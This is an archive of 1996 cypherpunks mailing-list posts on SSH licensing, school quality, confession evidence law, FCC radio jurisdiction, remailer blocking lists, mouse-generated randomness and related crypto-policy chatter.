PGP Keyserver Webpage: < http://bs.mit.edu:8001/pks-toplev.html >




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Wedgwood <chris@cybernet.co.nz>
Date: Fri, 27 Sep 1996 22:46:59 +0800
To: cypherpunks@toad.com
Subject: Re: ssh - How widely used?
Message-ID: <199609271206.AAA02796@cybernet.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


:From: martin hamilton <M.T.Hamilton@lboro.ac.uk>
:To: cypherpunks@toad.com
:cc: ssh@clinet.fi
:Subject: Re: ssh - How widely used?
:
:On Thu, 26 Sep 1996, Adam Shostack wrote:
:
:> 	Theres a windows version, mac is under vauge development.  SSH
:> is pretty cool, but the code base is somewhat messy, and its shows
:> signs of its origins in things like systems calls not having their
:> return values checked.
:
:Shame it costs $$$, though I appreciate that Tatu needs to eat... ;-) 
:
:Perhaps Cedomir Igaly could be persuaded to release the source code to the
:Windows port he did ?  Anyone else interested in getting a little group
:together to hack on this ?  (under GPL or BSD style copyright)
:
:Martin

I have a hackery botch job that I have done to make ssh run in a Windows NT
console session (untested under '95, but should work). The trouble is it
contains a mix of commercial code (which I do not own and cannot distribute)
and GNU code. Thus, I can use it myself - but not distribute it.

I was speaking to someone yesterday about this, as I was at one stage
thinking I may get the code cleaned up as much as possible (ie. only contain
GNU code) and release it to the masses to play with. Eventually it might
turn out to be something of use...

Doing this would, perhaps, undermine Datafellows and Tatu somewhat. As
someone who writes code to put food on the table, I wouldn't really feel
comfortable doing this. Tatu has spent a whole heap of time on this, doing
so wouldn't be fair this early. A freely available, albeit with no guarantee
or support and fewer features version of ssh would surely effect sales to a
reasonable extent?

I would recommend people buy the product. If you fell it too expensive, then
complain to datafellows about this. Eventually the make take some notice of
these complaints, or have alternate pricing structures that make the product
more attractive for your needs. IMO its not terribly expensive.




Chris

P.S. (Any replies to this please cc to me of ssh@clinet.fi as I don't read
     CP very often)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf Moeller)
Date: Sat, 28 Sep 1996 10:37:12 +0800
To: cypherpunks@toad.com
Subject: quotation
Message-ID: <m0v6lIf-0000BxC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


Found in a sig file:

"The people involved in the crypto debate are all intelligent, honorable and
 pro-escrow, but they never possess more than two of these qualities at once."
        -- Kenneth Neil Cukier (100736.3602@compuserve.com)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Byer <root@bushing.plastic.crosslink.net>
Date: Sat, 28 Sep 1996 14:51:47 +0800
To: declan@eff.org (Declan McCullagh)
Subject: Re: Public Schools
In-Reply-To: <Pine.SUN.3.91.960927120407.8474A-100000@eff.org>
Message-ID: <199609280512.BAA02469@bushing.plastic.crosslink.net>
MIME-Version: 1.0
Content-Type: text


>
> On Fri, 27 Sep 1996, ronsimpson wrote:
>
> > I hate to burst any bubbles but, the school with the highest number of
> > National Merit Finalists and highest number of 1600 SATs is a Public
> > High School (Jefferson High in Fairfax, VA)
> >
>
> Yeah, Fairfax has good schools. But you're misrepresenting the truth:
> what school has the highest *percentage* of 1600 SATers, etc.
>
> I suspect Jefferson High is larger than most private schools.

It's kind of funny to me to see Jefferson being discussed like this,
speaking as a student of it. :)

Actually, it's not all that big a school, thanks to the magic of
controlled admissions, with 1600 students for 4 grades.  This may be a
larger number than many private schools, but it is half the size of
many of the other public schools.  Jefferson probably has one of the
highest percentages in the country, if only because you have to pass a
rigorous standardized test just to get accepted to it.

--
Ben Byer    root@bushing.plastic.crosslink.net    I am not a bushing




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sat, 28 Sep 1996 18:11:59 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Confessing to a felony"
Message-ID: <3.0b19.32.19960928013142.0069aa3c@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:30 PM 9/27/96 -0800, Tim May wrote:
>
>Hearing me say I "exported crypto," a hearsay claim, and happening to find
>one or more laptops at my home, weeks or months later, implies nothing.
>Legal proof is still needed. Given only a nebulous statement like "I
>exported crypto in violation of the ITARs," or "I shipped PGP to Europe,"
>is not enough for a case even to be brought to trial.
>
>(If it reached trial, I would expect a defense attorney to move for
>dismissal. Absent any evidence that a crime occurred, absent any proof
>beyond the nebulous hearsay statement of a "braggart," there is simply no
>basis for criminal action.)
>
>"Stupid bragging criminals" may be common, but bragging is not in and of
>itself illegal. There still has to be evidence of a crime.
>
>"Produce the body."

I mostly agree re the "corpus delicti" rule (a confession must be
corroborated by independent evidence that a crime has been committed,
common law federally, statutory in Oregon (ORS 136.425(1)) but disagree
with your use of "hearsay" - statements of a defendant in a criminal
proceeding are not hearsay because they're the statements of a party
opponent. (In federal court and in Oregon, anyway - in California they're
hearsay but admissible as an exception. FRE 801(d)(2), ORE 801(4)(b), Cal
Evid Code 1220.)  

This quote from _US v. Singleterry_ (CA1, 1994) (sorry no F2 cite, found it
on a net database of slip opinions) does a nice job of addressing the
question at hand:

"To begin with, we note that a defendant's own statements are never
considered to be hearsay when offered by the government; they are treated
as admissions, competent as evidence of guilt without any special guarantee
of their trustworthiness. See Fed. R. Evid. 801(d)(2) & advisory
committee's note; see also United States v. Barletta, 652 F.2d 218, 219
(1st Cir. 1981). Nevertheless, there is a danger that the jury will rush to
credit a confession without seriously considering whether the defendant
confessed to a crime he did not commit. As a result, the federal courts
have adopted common law rules designed to prevent a jury from convicting
the defendant solely on the basis of an untrustworthy confession. The
general rule is that a jury cannot rely on an extrajudicial, post-offense
confession, even when voluntary, in the absence of "substantial independent
evidence which would tend to establish the trustworthiness of [the]
statement." Opper v. United States, 348 U.S. 84, 93 (1954). See also Smith
v. United States, 348
U.S. 147 (1954); Warszower v. United States, 312 U.S. 342 (1941); United
States v. O'Connell, 703 F.2d 645 (1st Cir. 1983). The Court has explained
that independent proof of the commission of the charged offense is not the
only means of establishing the trustworthiness of the defendant's
confession; another "available mode of corroboration is for the independent
evidence to bolster the confession itself and thereby prove the offense
`through' the statements of the accused." Smith, 348 U.S. at 156."
(footnotes omitted)

I think the question of what *would* constitute the corpus delicti is
interesting; the mere presence of PGP overseas shouldn't be enough. And
evidence like PGP's presence on a laptop which had once been overseas, or
airline ticket stubs or passport stamps or testimony from a security
officer who remembered making the defendant turn on the laptop at the metal
detector, or even surveillance camera footage would corroborate the
defendant's confession but not establish that a crime was committed. Such
evidence would seem to get us closer to the latter test mentioned in
_Singleterry_ but wouldn't meet Oregon's test of "some other proof that the
crime has been committed" (ORS 136.425) nor California's "the charged crime
actually happened" (People v. Jennings (1991) 53 Cal.3d 334, 368) standard.
But an ITAR prosecution would occur in Federal court, where evidence which
merely corroborates the confession (instead of proving a crime) may be
sufficient. 

(And, of course, this is all just so much jawboning. Not legal advice.
I'm inclined to avoid confessing to crimes via the Internet whether or not
it seems likely to lead to prosecution or conviction. I've already been to
one job interview where the employer had seen (and was unnerved) by my
vocal presence on the net.(!?!) Which is OK with me because if I make
someone nervous when they read Alta Vista, just wait until they meet me. :)
It's time to get used to the idea that whatever we write may come back in
20 or 30 or 40 years, whether we like it or not. I think it'll teach us
both a sense of forgiveness and a sense of discretion, but that may take
awhile.) 


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 28 Sep 1996 13:38:42 +0800
To: snow <cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <199609280109.UAA00349@smoke.suba.com>
Message-ID: <199609280353.VAA23910@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain



     There is a solution. Trade Schools,


        This is the single most important fact in the U.S. inability
    maintain the manufacturing  prowess we enjoyed until some poorly
    defined point in time after WWII!

        1.  several waves of immigration, most notably Germany after
            WWI, brought thousands of skilled machinists, &c. many
            of whom went the trade school route by screening or by
            socio-economic factors.

        2.  the U.S. prior to 1920 had an excellent trade school and
            apprentice program.

        WWII was the breaking point. the younger generation who
    survived the war wanted more for their children --hence the
    college emphasis for _everyone_!

        The problem was simple:  we have only the now retiring
    toolmakers who make it all possible.  engineering graduates will
    not observe the manufacturing floors since it is above their
    dignity to roll of their sleeves.

        if engineers were required to serve internships in the shops,
    as doctors are required to intern in a hospital (and the really
    good ones, the top of the class, choose what I call meat-wagon
    wards (large city ER and trauma units), the U.S. would be a far
    healthier and competitive environment.

        I know, why the meat wagon wards with their pressure and
    unreasonable hours?    experience, anything and everything
    comes through those doors every night, and it goes off the scale
    on the weekends...

        is there any reason to send an illiterate to college other
    to socialize?  is there any reason why the school system
    can only see a college degree other than for those who they
    prejudged to be just another generation of welfare mothers
    and deadbeat dads?

        why do many with 4 year college degrees only work as entry
    level secretaries, Burger King night "managers."  &c? then what
    do the rest of them do?  join the cradle to the grave dole gener-
    ation!


and Parental Envolvement.

It could  very well be (and if I had the money I'd make the bet)

that _many_ of the  "troubled" youth of today are simply

undisiplined.


        more the problem that the parents become interested too late,
    after the child has seen 2,000 murders on TV before the age of 6;
    walked the streets of parentless daytime; started cocaine at 16,
    maybe even 10; running for a gang....

        then they wail at the funeral: "...it's not fair, johnny was
    such a good boy...  society never gave him a chance...."   what
    they mean is they collect a $100/mo or so less from welfare!

        I have raised(ing) 5 children  --no TV in the house, and G
    rated movies occasionally.  what did/do the children find to
    do?  read, read, and read.  I don't have a problem trying to pry
    children away from a TV --but I often hear: "...puh-leez, daddy,
    just let me finish this chapter."   No such luck....



(Fortunately, most of  them couldn't afford to bet

against their parents in an AP world).


        real true...


It would also seem to

follow that if parents were spending their own money (or

perceived it as their own money) that they would take a greater

interest in their childrens education.


        ...if they were smart enough to start about age 3.  the
    problem is further excaberated by the fact the average family
    expects the state to provide the "enthusiasum"  --is there any
    reason then, to expect other than Hillary's "It's a global
village"
    with her brand of liberal brainwashing of the next generation
    (all new revisionist history, etc.).   Welcome to "Logan's Run!"

        fortunately, I have no problem with the public schools. I'm
    not the only one in the neighborhood without a TV, and the
    community has trade schools mixed with the high schools,
    and a two year college to supplement the advanced placement
    programs.  very few families have two parents working.  the kids
    can play outside after dark, and our young women can walk by
    themselves after dark.  (I do admit that one good scream would
    have an extremely well-armed about to be posse out the door in
    15 seconds...  --I doubt there would be prisoners!)

        a very unusual situation  --but I live in rural southern utah
    where the regional middle school of 1200 can support 4 bands, the
    top 2 being very impressive, and provide full AP classes, and ACT
    scores averaging 24-26+ v. the national average of 20 for inbound
    freshman. and, where an average ward (100-150 families) will have
    at least a dozen Eagle scouts.

        proves your point, I guess...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 29 Sep 1996 02:17:58 +0800
To: cypherpunks@toad.com
Subject: Basis of FCC Jurisdiction [RANT]
Message-ID: <v02130500ae729c400e4a@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Last week I started a thread on the Telecom Regulation list.  My intention
was to introduce discussion of some circe-1780s Republican questioning, as
opposed to the widely accepted Federalist.  The most interesting composite
result is below:

>Date: Sat, 21 Sep 1996 22:08:03 -0500
>Reply-To: telecomreg@relay.doit.wisc.edu
>Originator: telecomreg@relay.doit.wisc.edu
>Sender: telecomreg@relay.doit.wisc.edu
>Precedence: bulk
>From: "Michael D. Sullivan" <mds@access.digex.net>
>To: Multiple recipients of list <telecomreg@relay.doit.wisc.edu>
>Subject: Re: Basis of FCC Jurisdiction (Republican rant)
>X-Comment: Requests (UNSUBSCRIBE/HELP) to: listserver@relay.doit.wisc.edu
>MIME-Version: 1.0
>
>Steve Schear <azur@netcom.com> wrote:
>
> >I've been wondering lately about the jurisdictional limits of the FCC
> >vis-a-vis the Article(s) of the Constitution from which they derive their
> >authority.  My understanding is that the FCC is empowered under the Fed's
> >interstate commerce clauses.  If so, how valid is their jurisdiction over
> >low power and/or millimeter wave transmissions.  It seems a case can be
> >made that such transmissions represent little or no possibility of
> >interstate transmission.
>
>To which Bob Jacobson <bob@worldesign.com> replied:
>
> >The FCC derives its authority by Congressional mandate, so the question is
> >rightly posed as "Does Congress have rights to regulate local radio trans-
> >missions?"  Congress abrocated to itself the right to regulate all radio
> >transmissions, on the grounds that any transmission might interfere with
> >the transmissions of interstate broadcasters.  Generally, this right has
> >been upheld by the courts, although states have successfully challenged
> >the absolute power of the FCC with regard to certain aspects of non-radio
> >transmissions -- for example, telephone calls -- that do not cross state
> >boundaries and even some that do.  To my knowledge, no form of electronic
> >transmission is invulnerable to some type of regulation, whether federal
> >or state (including municipal regulation by cities and counties, creatures
> >of the states).  Of course, there are loopholes, as the Internet has amply
> >demonstrated.
>
>In further response, John Levin <jlevin@paonline.com> added:
>
> >This discussion is incorrect by omission. The reason that states have
> >authority over intrastate telephone service is because Congress says they
> >do. The Telecommunications Acts carve out areas of state and federal
> >jurisdiction.  The FCC, like any other agency, takes an expansive view of
> >their authority and courts occasionally rein in such excursions after
> >looking at their enabling statutes.  The technical doctrine is 'federal
> >preemption', and unless Congress expressly preempts the states, or the
> >preemption is necessary to effectuate a national policy authorized by
> >federal legislation, the states retain control of state activities.  As to
> >what constitutes 'interstate commerce' for the purposes of the U.S.
> >Constitution, there are hundreds, if not thousands of court decisions on
> >that topic.  During most of this century, usually even a very slight
> >impact on interstate commerce has been found to be sufficient for Congress
> >to legislate.  Those of you who plan on using 'states rights' as a basis
> >for disobeying Federal laws or regulations should consult an attorney and
> >get your affairs in order before you act.
>
>Although nothing in the Communications Act of 1934 or it predecessor Radio
>Acts states so explictly, it is implicit that the Interstate Commerce Clause
>is the basis for the statute and for FCC radio licensing jurisdiction.  That
>was undoubtedly one of the bases for earlier legislative and Commerce
>Department regulation of radio, along with providing for the national
>defense.  Under the Commerce Clause and the Necessary and Proper Clause,
>Congress can assert jurisdiction over virtually anything affecting
>interstate commerce.  This clearly underlies Section 301 of the
>Communications Act, which asserts federal jurisdiction and control over all
>interstate radio transmissions and requires FCC licensing for the same.
>
>The Communications Act does not assert jurisdiction over, or require FCC
>licenses for, radio transmissions between two points in a single state (not
>including D.C.).  In fact, this doesn't remove virtually anything from
>federal jurisdiction or licensing as a matter of law, because radio
>transmissions don't stop at any particular point, they merely attenuate as
>they continue to propagate onward ad infinitum.  As a technical matter, a
>milliwatt-level millimeter-wave radio transmission from one end of a
>steel-encased underground chamber to a receiver at the other end propagates
>to points thousands of miles away, albeit at an undetectible level (i.e.,
>waaaaay below the noise floor), and it therefore could be viewed as an
>interstate radio transmission.  Practically, however, such transmissions
>stop at the steel shielding.  The FCC, therefore, will be unable to document
>that there was an interstate radio transmission and would likely be unable
>to shut you down.
>
>The FCC has adopted rules that permit unlicensed operation under common
>circumstances when there is unlikely to be any interstate effects.  Part 15
>sets forth power levels and other transmission parameters for certain
>frequency bands that do not require licensing.  Although the jurisdictional
>basis for Part 15 has never been expressly stated, the FCC views such
>transmissions as not, in any practical sense, likely to interfere with
>licensed transmissions, and the unlicense use of spectrum is conditioned on
>not interfering.
>
>One could argue that other low-power or physically confined radio
>transmissions are also unlikely to cross state lines as a practical matter,
>or to interfere with licensed transmissions, and are therefore beyond the
>FCC's jurisdiction.  The FCC has not conceded its jurisdiction in such
>cases, however.  There is currently litigation ongoing regarding a
>California (Berkeley, perhaps?) low-power FM station that did not obtain a
>license.  It doesn't interfere, and it can't be received out-of-state.  Can
>the FCC shut it down?  Yet to be decided.
>
>Steve Schear also wrote:
>
> >Another question has to do with spectrum ownership.  Prior to the '34 Act
> >who owned the spectrum.  Was any compensation made for the taking?
>
>To which Bob Jacobsen replied:
>
> >As to ownership of the spectrum, the spectrum still is owned by the people
> >of the United States, held in public trust.  So-called "sales" of spectrum
> >are actually licenses to use various frequencies under different rules.
> >Presumably Congress has the right to sell this "property" in the same way
> >that it sells forests on public lands, but so far it has not done so.  On
> >the other hand, the federal government has exacted remarkable fees for
> >certain licenses:  PCS operators have already put up over $17 billion in
> >fees for licenses auctioned by the FCC!
>
>Actually, spectrum isn't "owned" by anyone, including the people of the
>United States.  One can't own a physical dimension such as frequency, any
>more than distances, speeds, or colors.  The federal government has asserted
>*control* over the *use* of spectrum, however, just as it and the states
>assert control over the use of particular speeds in particular locations
>(e.g., 55 or 65 mph on freeways).  As Bob said, the right to use spectrum,
>within specifically defined geographic, frequency, power, and time limits,
>is conferred by licenses awarded by the FCC.  These licenses, for a
>specified term, are sometimes given away to the first person who asks for
>them, sometimes awarded by hearing or lottery, or, more recently, sometimes
>awarded on the basis of the highest bid.  The FCC isn't selling spectrum per
>se, but a license for the exclusive right to use particular spectrum under
>the defined terms of the license.  This is very different from selling
>public land, but is somewhat like selling the right to harvest the trees (or
>mine the coal, or drill and pump the oil) from a piece of federal land for a
>certain number of years.
>
>
>----------------------------------------------------------------------
>Michael D. Sullivan, Bethesda, Maryland, USA
>mds@access.digex.net / avogadro@well.com / 74160.1134@compuserve.com
>----------------------------------------------------------------------
>



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 28 Sep 1996 19:31:18 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <v03007800ae72776fcbd0@[207.167.93.63]>
Message-ID: <199609280943.DAA28475@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <v03007800ae72776fcbd0@[207.167.93.63]>, on 09/27/96
   at 10:36 PM, "Timothy C. May" <tcmay@got.net> said:


At 3:02 AM +0000 9/28/96, attila wrote:


>        a very unusual situation  --but I live in rural southern

> utah where the regional middle school of 1200 can support 4

> bands, the top 2 being very impressive, and provide full AP

> classes, and ACT


Wow! Utah is teaching AP?  Is Jim Bell being brought in as a

Special Lecturer?


        come on, Tim... you are not that old.  AP has three meanings
    (at least):

        1.  Associated Press (news gathering)
        2.  Advanced Placement (as in college credit for HS classes)
        3.  not widely known:  Jim Bell's Assassination Political
Inanity.

        I wonder if Jim Bell would enjoy his stay in Utah's Dixie?
    there is only one bar in Washington county, and I understand
    it's pretty limited (if you even find it!).


(I knew Idaho has special Militia classes, but to hear that Utah is

now teaching Assassination Politics is pretty impressive.)

        Utah does not need militia classes:

        1.  opening of deer season (Oct 20) is a state holiday.
every-
            thing shuts down: schools, business, government... we take
            it real serious....

        2.  according to info I scanned from one of those moving
            target bleeding heart liberals, utahns have more weapons
            than children, and you know we have a lot of children.

        3.  if you are aware of Mormon heritage: despite a trail of
            blood from Kirtland (mild), Missouri (3 times, severe),
            and Nauvoo (medium), only one incident (in Missouri)
            found Mormons fighting to defend themselves.  In Utah,
            we endured an occupying U.S. army for almost 50 years
            while statehood was denied...  and our leaders were
            imprisoned, property and assets confiscated, etc.

        that's OK, tim;  I'm glad you're still feeling your oats in
    your old age!

--
one of the few things we all share:
  the utter, corrosive contempt for our elected officials.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Sat, 28 Sep 1996 23:44:20 +0800
To: cypherpunks@toad.com
Subject: Crypto and six yr old sex perverts: Project Electric Potatoes [CRYPTO]
Message-ID: <960928093843_295524911@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Using crypto may be required to keep ya outta jail, given the guberment has
gone so far low as to "route out this six year old sex pervert busy kissing
the girls." (Quoted for emphasis.)

I wonder when sexual harassment will become a sex offence.  Are the red
sashed sex cores of Orwell's 1984 around the corner?

I wonder if he will need to register with the sheriffs office in any towns he
moves into as a sex offender - or has that law not passed yet?

Soon I believe our communications will be turned against us - as I am sure I
will hear about this one in the future....

Crypto can help us from the all intrusive guberment - it is far to big.

Hence a new project for us all:  Multicast Crypto referred to as Electric
Potatoes as mashed up potatoes are hard to put back together.

Purpose:

Already we are seeing problems for speech on the internet (see radikal
postings - though they are a bit fruity IMHO.)  And it sounds like the law in
one country is going to be very interested in arresting people in another.

Hence, perhaps we need a crypto system (including human procedures and fail
safes) for community discussions.

Crypto is very much one to one right now, but can we implement a crypto for
wide distribution to a very defined set of people?

This should be useful in commerce too... like CC of mail to others, etc.

Problem Definition Time:

Who will be responsible for allowing a member into the community?  (And all
the other trust issues...)

The software to implement the community must be available on multiple
platforms like UNIX, Windoze, Macintosh, NeXT, etc.

How do we over come the problems of storage - should the messages remain
encyphered at all times in local storage of a member in case of a knock on
the door, requiring the user to use the software to read, write, store, and
organize messages.

Is it even possible to overcome the human turncoat factor?  Can we protect
them as well as us from coercian, black mail, seizure, or defection?

Is this even possible, because we are looking for the freedom to speak, yet
nobody will be able to hear us!!!

**********

Method of discussion:

Since we will all hopefully have many ideas and comments on this exercise,may
I provide a protocal:

Please have Project Electric Potatoes in the subject heading - some of us use
the delete key quite freely and don't want to accidently remove your valued
comments and ideas.

Should the message contain a problem definition, please have Problem in the
subject.

Should the message contain an answer please have Answer in the subject.

Should the message contain a rant, please have Rant in the subject.

I leave it to the writer to include [CRYPTO] in the header....

Thank You All, and I hope we get a great discussion going on here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 30 Sep 1996 01:08:49 +0800
To: cypherpunks@toad.com
Subject: Re: [CRYPTO] (was: sig/noise ratio)
Message-ID: <844009091.10211.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> > Items crypto related but missing the [CRYPTO] header could be
> > reposted by well meaning souls.
> > 
> > Other appropriate headers could of course be used.
> > 
> > Brian

Yeah,

It`s sad that it`s got to this stage now but I support the idea 
anyway, I`ll start prefixing all my cryptographic code or technical 
postings with the headers.

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 30 Sep 1996 01:21:20 +0800
To: cypherpunks@toad.com
Subject: Re: Mousepad RNG's?
Message-ID: <844009092.10210.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> I just downloaded a copy of the beta version of Datafellows
> Windows 3.1 SSH and it asked to move the mouse around to
> generate some randomness.  In reading Applied Crypto, it
> mentioned that there is no such thing as generating
> randomness from a personal computer unless something like
> a Geiger counter is used.  Is there any way to create a
> fairly random sample from the mouse? Should one use lots
> of jerky movements, or take ones time with it?

What applied crypto would have said was that one cannot generate 
randomness on a computer without reference to an external source, a 
mouse is as good as any, the real problem is generating random 
numbers using PRNGs (Pseudo random number generators) which are 
algorithms that produce statistically random data that may be 
predictable, in the words of John Von Neumann "Anyone who considers 
aritmetic methods of generating random numbers is in a state of sin"

In brief, a mouse output would be acceptable, just move the mouse any 
old way around the screen and the data will be random enough for your 
uses...

 

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sun, 29 Sep 1996 02:51:15 +0800
To: cypherpunks@toad.com
Subject: Re: quotation
In-Reply-To: <m0v6lIf-0000BxC@ulf.mali.sub.org>
Message-ID: <Pine.SUN.3.91.960928095111.19146A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


That came from a report Kenneth filed for the fight-censorship list from 
Paris earlier this week after his dinner conversation with U.S. OECD 
delegates:
 http://www.eff.org/~declan/global/g7-oecd/oecd_paris_cukier_092696.article

I don't forward everything to cypherpunks. If you want to read the stuff, 
subscribe to the list:
  http://www.eff.org/~declan/fight-censorship/

-Declan



On Sat, 28 Sep 1996, Ulf Moeller wrote:

> Found in a sig file:
> 
> "The people involved in the crypto debate are all intelligent, honorable and
>  pro-escrow, but they never possess more than two of these qualities at once."
>         -- Kenneth Neil Cukier (100736.3602@compuserve.com)
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Sep 1996 01:03:19 +0800
To: cypherpunks@toad.com
Subject: Re: Making Remailers Widespread
In-Reply-To: <199609280358.UAA02589@dfw-ix4.ix.netcom.com>
Message-ID: <siyyuD50w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:
...
> Doing two-way remailers would be better, but that's still a hard problem,
> and I don't want to widely deploy shoddy two-way-remailers.

Unfortunately, one-way remailers have much fewer uses than two-way remailers,
any many of these uses are abusive.

> - The remailer script would have to add disclaimers at the beginning
> and/or end of the message reminding readers that the message is
> anonymous, and to contact the remailer cabal rather than the postmaster.

Julf's anon.penet.fi used to add a signature with a disclaimer.

> - Blocking becomes a big problem - it's annoying enough now,
> when there are a small number of remailers with hard-working operators;
> we'd need some sort of automated blocking support to make it
> usable by relatively non-involved operators

Yes.

> - A centralized block list (e.g. http://www.remailer.net/block.txt)
> which all of the form-based remailers could load and reference would
> allow non-picky operators not to have to handle it themselves

A single centralized point of failure is bad. Maybe 4 or 5 redundant ones.
A blocking request sent to one will be replicated in the other automatically.

> - Implementing the blocking list as a web form for people who
> want to be blocked would make it relatively painless to use;
> remailer-operators wouldn't have to transcribe email from the
> remailer-operators list to use it, which helps with other problems.
>
> - Of course, once anybody can fill out their name and ask to be
> blocked, it's possible for spoofers to block people who don't want to be.
> One approach for preventing this is to implement a three-way handshake
>         - user fills out form, form mails back blocking notice with cookie,
>                 user returns cookie to complete blocking

That's the protocol Eric Thomas's listserver uses to make sure mailing list
subscription requests aren't spoofed. I think I mentioned it recently on
this list in the context of creating a similar blocking list for addresses
that don't want to receive unsolicited commercial e-mail. Indeed, if such
a system is put up, it could maintain several blocking lists:

addresses who don't want any remailer mail
addresses who don't want 1-way remailer mail, but are willing to get
 2-way remailer mail
addresses who don't want unsolicited commercial e-mail (probably a biggie :-)
addresses who will only accept PGP-signed e-mail
etc.

>         - this is a bit messier for mailing lists, but we can ignore...

We can't quite ignore... In the scheme you've just described, someone can
enter a blocking request via a Web page and give a submission request for
some mailing list, and the cookie will be e-mailed to the mailing list.

>         - special-case for "postmaster", who may want to block
>                 all of foo.domain instead of just postmaster@foo.domain
>         - special-special-case for postmasters of big sites, e.g. aol, netcom
>                 who we may want to ignore?
> - A sender-blocking list is harder, and may still take human attention

I don't think it's a good idea to suport blocking receivers in an entire
domain, like *@aol.com. Just say it's not supported.

I don't think it's a good idea to support sender blocking at all.

Would the receiver blocking list be available to everyone to view? That
sounds like a violation of privacy. Someone suggested on this list that
(assuming that the entires are addresses that match exactly, not regular
expressions), one can store hashes of addresses. Then when a remailer
wants to know if a particular address is on the list, it computes the
hash and searches for it (binary search is fast).

A curious person can check whether a particular address is no the list,
but can't obtain the list of all blocked receivers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 29 Sep 1996 03:53:56 +0800
To: snow <aba@dcs.ex.ac.uk (Adam Back)
Subject: Re: crypto anarchy vs AP
Message-ID: <199609281729.KAA05451@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:06 PM 9/26/96 -0500, snow wrote:
>Mr. Beck said:
>> Been reading the AP thread, and thought I'd donate some of my views.
>
>> the Internet.  You'd just cause the government to panic, and this
>> would have negative effects, it would take ages for them to calm down,
>> and the laws they'd pass in the mean time would mean a near certainty
>> of mandatory GAK as a condition to switching the Internet back on.
>> (Before someone takes me to task for the impossibility of switching
>> the Internet off, it all depends on the level of government panic.
>> More specifically perhaps they would disconnect key backbones, and
>> ISPs briefly while they rushed into effect a few presidential decrees
>> outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets,
>> etc.)
>
>     This would be cutting their own throats. There is SO much commercial
>and government traffic going across "The Net" that many businesses would 
>scream bloody murder, and the government would have MASSIVE trouble with 
>it's agenda.

Yes, that "they'll cut off the Internet!" talk doesn't seem to be very 
practical.  Society very quickly develops dependency on inventions.  Try to 
take away their computers and they'd scream; take away their telephone and 
it'd be worse!  Give Internet another couple of years and 50% of big 
business would be severely impacted should it be cut off.  Wait five years 
and the world would practically stop rotating without Internet.

On a related issue, GPS (global-positioning system) contains a de-accurizing 
mis-feature called S/A, which adds a little error to the location as 
detected by a receiver.  Ostensibly, it was added so that this could be 
turned on in wartime, to deny the enemy the ability to make 10-meter fixes.  
Turns out that it was kept on all the time, probably because if it WASN'T it 
would become politically impossible to de-accurize the system even in wartime.


Jim Bell
jimbell@pacifier.com




